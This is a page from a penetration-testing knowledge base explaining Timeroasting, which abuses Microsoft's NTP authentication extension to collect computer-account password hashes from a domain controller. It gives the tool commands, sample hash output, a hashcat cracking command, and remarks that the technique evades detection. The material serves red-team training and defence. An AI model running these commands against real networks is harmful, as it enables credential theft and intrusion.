Pentest Everything
GitHubSupport Pentest Everything
  • ⚔️Pentest Everything
  • 🚩Writeups
    • CyberSecLabs
      • Active Directory
        • Dictionary
        • Spray (WIP)
      • Linux
        • Shock
        • Pie
      • Windows
        • Brute
        • Deployable
        • Glass
        • Monitor
        • Sam
        • Secret
        • Stack
        • Unattended
        • Weak
    • HackTheBox
      • Active Directory
        • Active
        • Blackfield
        • Cascade
        • Forest
        • Intelligence
        • Mantis
        • Monteverde
        • Resolute
        • Return
        • Sauna
        • Search
      • Linux
        • Antique
        • Armageddon
        • Backdoor
        • Bashed
        • Cap
        • Cronos
        • Curling
        • Knife
        • Lame
        • Help
        • Horizontall
        • OpenAdmin
        • Poison
        • SolidState
        • Traceback
        • Trick
      • Windows
        • Access
        • Artic
        • Bastard
        • Bastion
        • Bounty
        • Devel
        • Heist
        • Jeeves
        • Jerry
        • Legacy
        • Love
        • Optimum
        • Remote
        • SecNotes
        • Servmon
        • Timelapse
        • Querier
    • PG Play | Vulnhub
      • Linux
        • BBSCute
        • BTRSys2.1
        • Born2root
        • BossPlayersCTF
        • Covfefe
        • Dawn
        • DC5
        • Funbox
        • FunboxEasy
        • FunBoxEasyEnum
        • HackerFest2019
        • Geisha
        • JISCTF
        • My-CMSMS
        • NoName
        • OnSystemShellDredd
        • Photographer
        • Potato
        • PyExp
        • Samurai
        • SunsetDecoy
        • SunsetMidnight
        • SunsetTwilight
        • Wpwn
    • PG Practice
      • Linux
        • ClamAV
        • Nibbles
        • Payday
        • Pelican
        • Peppo
        • Postfish
        • Pwned1
        • Snookums
        • Sirol
        • Sorcerer
        • Quackerjack
        • WebCal
        • Walla
        • ZenPhoto
        • Zino
      • Windows
        • Algernon
        • Compromised
        • Kevin
        • Helpdesk
        • Hutch
        • Jacko
        • Meathead
        • Metallus
        • Shenzi
        • Slort
        • UT99
    • TryHackMe
      • Linux
        • All in One
        • Archangel
        • Anonforce
        • Biblioteca
        • Cat Pictures
        • Chill Hack
        • CMesS
        • ColddBox
        • ConvertMyVideo
        • CyberHeroes
        • Cyborg
        • Dav
        • Fusion Corp
        • GamingServer
        • Gallery
        • Internal
        • Jacobtheboss
        • Kiba
        • LazyAdmin
        • Library
        • Madness
        • Marketplace
        • Mustacchio
        • NerdHerd
        • Oh My WebServer
        • Olympus
        • Plotted-TMS
        • Skynet
        • Startup
        • Surfer
        • Team
        • Tech_Supp0rt: 1
        • Tomghost
        • VulnNet
        • Undiscovered
        • Year of the Owl
      • Windows
        • Blueprint
        • Enterprise
        • Flatline
        • Quotient
        • RazorBlack
        • Relevant
        • USTOUN
        • VulnNet: Roasted
    • To Do
      • AllSignsPoint2Pwnage (WIP)
      • Hunit (WIP)
      • Escape (WIP)
      • Banzai (WIP)
      • Billyboss (WIP)
      • Fish
      • Ra
      • Roquefort (WIP)
  • 💾GitHub
  • 🔵PsMapExec
    • Change Log
    • BloodHound
    • Using Credentials
    • Cross Domain Usage
    • Methods
      • Command Execution
      • DCSync
      • GenRelayList / SMB Signing
      • Inject
      • IPMI
      • Kerberoast
      • MSSQL
      • Session Hunter
      • Spray
    • Modules
      • Amnesiac
      • ConsoleHistory
      • Files
      • FileZilla
      • KerbDump
      • eKeys
      • LDAP / LDAPS
      • LogonPasswords
      • LSA
      • MDF
      • NTDS
      • Notepad
      • NTLM
      • SAM
      • SCCM
      • SessionExec
      • SessionRelay
      • SSH
      • TGTDeleg
      • VNC
      • Wi-Fi
      • WinSCP
    • Target Acquisition
  • Everything
    • Buffer Overflow Guide
    • Everything Active Directory and Windows
      • Active Directory Enumeration
      • ADCS
        • Enumeration - Certificate Authority
        • ESC1
        • ESC2
        • ESC3
        • ESC4
        • ESC6
        • ESC7
        • ESC8
        • ESC9 - WIP
        • ESC11
      • Access Token Manipultion
        • Token Impersonation
        • Create Process with Token
        • 🔨Make and Impersonate Token
        • Parent PID Spoofing
        • 🔨SID-History Injection
      • Adversary-in-the-Middle
        • 🔨LDAP Relay
        • 🔨LLMNR
        • 🔨RDP MiTM
        • 🔨SMB Relay
      • Credential Access
        • Brute Force
          • Password Spraying
        • Credential Dumping
          • LSASS Memory
          • Security Account Manager (SAM)
          • NTDS
          • LSA Secrets
          • Cached Domain Credentials
          • DCSync
            • 🔨DCSync Attack
        • Credentials from Password Stores
          • Credentials from Web Browsers
          • Windows Credential Manager
        • Unsecured Credentials
          • Credentials In Files
          • Credentials in Registry
          • Group Policy Preferences
            • 🔨GPP Passwords
        • 🔨Modify Authentication Process
          • Domain Controller Authentication: Skeleton Key
          • Reversible Encryption
        • Steal or Forge Kerberos Tickets
          • AS-REP Roasting
          • Golden Ticket
          • Kerberoasting
          • Silver Ticket
          • S4U2Self
          • Ticket Aquisition
          • Constrained Delegation
          • Unconstrained Delegation
      • Collection
        • Clipboard Data
        • Audio Capture
      • Defense Evasion
        • Disable and Bypass Defender
        • Impair Defenses
          • Disable Windows Event Logging
          • Impair Command History Logging
          • Disable or Modify System Firewall
        • Indicator Removal
          • Clear Windows Event Logs
          • Clear Command History
          • File Deletion
          • Network Share Connection Removal
          • Timestomp
      • Input Capture
        • Keylogging
      • Lateral Movement
        • PowerShell Remoting
        • Alternate Authentication Material
          • Pass The Hash
          • Pass the Ticket
          • Pass the Password
      • File Execution Methods
      • File Transfer Techniques
      • Forced Coercion
        • URL File Attack
      • LAPS
      • Network Sniffing
      • Persistence
        • AdminSDHolder
        • BITS Jobs
        • Create Account
          • Local Account
          • Domain Account
          • Cloud Account
        • Create or Modify System Process
          • Windows Service
        • Custom SSP
        • DSRM
        • 🔨Persistence Notes
        • Skeleton Key Attack
      • Privilege Escalation
        • Privilege Escalation Checklist
        • DnsAdmin
        • Registry
          • Always Install Elevated
          • AutoRuns
        • Service Exploits
          • Insecure Service Permissions
      • SCCM / MECM
        • Recon
        • CRED-1 - PXE Abuse
        • CRED-2 - Policy Request Credentials
        • CRED-3 - WMI Local Secrets
        • CRED-4 - CIM Repository
        • CRED-5 - MSSQL Database
        • ELEVATE-2 - Client Push
        • TAKEOVER-2
      • Timeroasting
      • Tools
        • BloodHound
    • Everything Linux
      • File Transfer Techniques
      • Linux Privilege Escalation Techniques
      • Privilege Escalation Checklist
      • Shell Upgrades
    • Everything OSINT
      • Discovering Email Addresses
      • Dork Tools
      • Image OSINT
      • Metadata OSINT
      • Password OSINT
      • Phone Number OSINT
      • Search Engine Operators
      • Social Media OSINT Tools
      • OSINT CTFs
      • OSINT VM
      • Username OSINT
    • Everything Web
      • Command Injection
      • Enumeration
      • File Upload
      • Sub Domain Enumeration
      • XSS
    • Host Discovery
    • Pivoting and Portforwarding
    • Ports
      • Nmap Commands for port discovery
      • Port 21 | FTP
      • Port 25 | SMTP
      • Port 53 | DNS
      • Port 88 | Kerberos
      • Ports 111 | 32771 | rpcbind
      • Port 123 | NTP
      • Ports 137 | 138 | 139 | NetBIOS
      • Ports 139 | 445 | SMB
      • Ports 161 | 162 | SNMP
      • Port 389 | LDAP
      • Ports 1099 | Java RMI
      • Ports 2049 | NFS
      • Port 3389 | RDP
      • Ports 8080 | 8180 | Apache Tomcat
    • PowerShell
      • Constrained Language Mode
      • Download and Execution Methods
      • Resources
      • Restricted Mode
  • Resources
    • Cheat Sheets
      • Default Passwords
      • Kerberoast
      • Mimikatz
      • Powerup
    • Hashcat Word lists and Rules
    • Metasploit Modules
    • Misc Snippets
    • GTFOBins
    • LOLBAS
    • WADCOMS
    • Reverse Shell Generator
    • OSINT Tools
    • Weakpass
  • Password Filter DLL
  • Dork Cheatsheet
Powered by GitBook
On this page
  • Description
  • Unauthenticated
  • Linux
  • Windows
  • Authenticated
  • TL:DR
  • Hashcat

Was this helpful?

  1. Everything
  2. Everything Active Directory and Windows

Timeroasting

Last updated 1 month ago

Was this helpful?

Description

Domain-joined computers typically synchronize their clocks using the Network Time Protocol (NTP), with a Domain Controller (DC) acting as the time source. However, traditional NTP lacks authentication, making it vulnerable to man-in-the-middle (MitM) attacks where an adversary could spoof responses and manipulate the client’s system time.

To mitigate this risk, Microsoft implemented a proprietary extension to NTP that introduces cryptographic authentication. When a computer sends an NTP request, it includes its Relative Identifier (RID) in a special extension field. The Domain Controller responds by appending a Message Authentication Code (MAC) to the response, generated using the NTLM (MD4) hash of the computer account's password as the key.

Crucially, the client does not need to authenticate to the DC in order to make this request. It can simply specify any RID, and the DC will look up the corresponding computer account and generate a response using its password hash.

While this design addresses time spoofing concerns, it introduces a significant security side effect: unauthenticated clients can effectively request salted password hashes for any computer account in the domain. In theory, this isn't a concern if all computer passwords are long, random, and machine-generated — but that's not always true in practice.

As a result, this NTP extension can be abused to harvest password-equivalent hashes for offline cracking, particularly targeting computer accounts with weak or misconfigured passwords.

Reference:

Unauthenticated

As discussed in the Whitepaper, this attacks works from an unauthenticated perspective. The only slight roadblock here is that we would need to resolve the RIDs of any cracked hashes back to their respective computer name.

Linux

Github:

python3 timeroast.py 10.10.10.100
Output
1000:$sntp-ms$fa0df21ba416b39aa192bb06963714f4$1c0111e900000000000a649c4c4f434ceba3...
1104:$sntp-ms$d9704f7ad11724ad7bee71afbe1e5db5$1c0111e900000000000a649c4c4f434ceba3...
1165:$sntp-ms$66a3515011c09903bc16c8a2cb5c31f6$1c0111e900000000000a649d4c4f434ceba3...
1166:$sntp-ms$e704e60d2a7ee3d8792925c72d6634b9$1c0111e900000000000a649d4c4f434ceba3...

Windows

. .\timeroast.ps1
Output
1000:$sntp-ms$73d9d6aa36e20f7e6a0305de31f4caea$1c0111e900000000000a6c304c4f434ceba33c67e3304da5e1b8428bffbfcd0aeba3...
1104:$sntp-ms$e0d04e3046d323951806eebf45ba9f83$1c0111e900000000000a6c314c4f434ceba33c67e3528d6be1b8428bffbfcd0aeba3...
1165:$sntp-ms$27ce4356ae08450bab8e427fbaf07fc7$1c0111e900000000000a6c324c4f434ceba33c67e347e3c4e1b8428bffbfcd0aeba3...
1166:$sntp-ms$1187bae435e15f9aca9a032b54f13e1f$1c0111e900000000000a6c324c4f434ceba33c67e3b8c9e0e1b8428bffbfcd0aeba3...

Authenticated

It's clear from the research around Timeroasting why this technique can be an attractive initial access vector, especially in scenarios where no credentials are available. However, performing Timeroasting from an authenticated perspective also has its own distinct advantages.

Firstly, when authenticated, we can resolve RIDs to hostnames automatically. This significantly simplifies attribution — allowing us to map each SNTP hash back to the corresponding computer account in Active Directory.

Secondly, one could argue that Timeroasting from an authenticated context may seem redundant. After all, if our goal is to obtain hashes for computer accounts, we could simply modify tools like Rubeus or Invoke-Kerberoast, which typically filter only for user objects with Service Principal Names (SPNs). With minimal adjustments, these tools could be extended to include computer objects as well. That said, this approach is rarely used in practice, largely because computer accounts typically use long, random, and machine-generated passwords — making them infeasible to crack unless there's a misconfiguration or weak password policy in place (e.g., set during manual provisioning or imaging).

Interestingly, SNTP hashes obtained through Timeroasting can be cracked approximately 10x faster than traditional Kerberos 5 TGS-REP (etype 23) hashes. While this still doesn't make cracking a randomly generated machine password likely, it does significantly improve the odds when weak passwords are involved — particularly in environments with lax onboarding procedures or poor password hygiene.

Lastly, requesting SPNs for all computer accounts in the domain (as done during Kerberoasting) is far noisier from an OPSEC standpoint. While Timeroasting does generate network traffic for each requested system, it's still a relatively obscure technique. As a result, it's more likely to slip under the radar of typical detection pipelines — making it an attractive alternative when stealth is more a priority.

TL:DR

Timeroasting is a solid option for both unauthenticated and authenticated access. Authenticated use allows easier mapping of SNTP hashes to hostnames, but may seem redundant since Kerberoasting can be adapted to target computer accounts. However, SNTP hashes crack 10x faster than Kerberos TGS-REP hashes, improving chances of success against weak passwords. Plus, Timeroasting is stealthier than mass SPN enumeration, making it more OPSEC-friendly and a valuable alternative in red team ops.

# Default Execution
Invoke-AuthenticatedTimeRoast -DomainController 10.10.10.100

# Generate wordlist based on computer names
Invoke-AuthenticatedTimeRoast -DomainController 10.10.10.100 -GenerateWordlist
Output
DC01:$sntp-ms$4b7afe1572d2d273d25ae570dd1126a7$1c0111e900000000000a6ca74c4f43...
WS01:$sntp-ms$5c475eb8012429bf9a91c96c993cfb66$1c0111e900000000000a6ca74c4f43...
Test06:$sntp-ms$7486e4dd0c30b8858c64e52b037df7fb$1c0111e900000000000a6ca74c4f43...
Test09:$sntp-ms$d4ec232496d37575b1dbe7e1ef22cd7b$1c0111e900000000000a6ca74c4f43...

Hashcat

At the time of writing; the beta version of hashcat is required to crack SNPT hashes (Mode 31300).

In addition to using common wordlists and rule sets, it's important to include a wordlist of all computer names (lowercased, without the trailing $). This helps catch cases where the computer password matches the hostname—a pattern often seen when accounts are created using the net computer command or the "Assign this computer account as a pre-Windows 2000 Computer" option in the GUI.

hashcat.exe -m 31300 -a 0 -O hashes.txt rockyou.txt --username

Github:

Invoke-AuthenticatedTimeRoast can be used to better support timeroasting from an authenticated perspective. Github:

URL:

https://www.secura.com/uploads/whitepapers/Secura-WP-Timeroasting-v3.pdf
https://github.com/SecuraBV/Timeroast/blob/main/timeroast.py
https://github.com/SecuraBV/Timeroast/blob/main/timeroast.ps1
https://github.com/The-Viper-One/Invoke-AuthenticatedTimeRoast
https://hashcat.net/beta/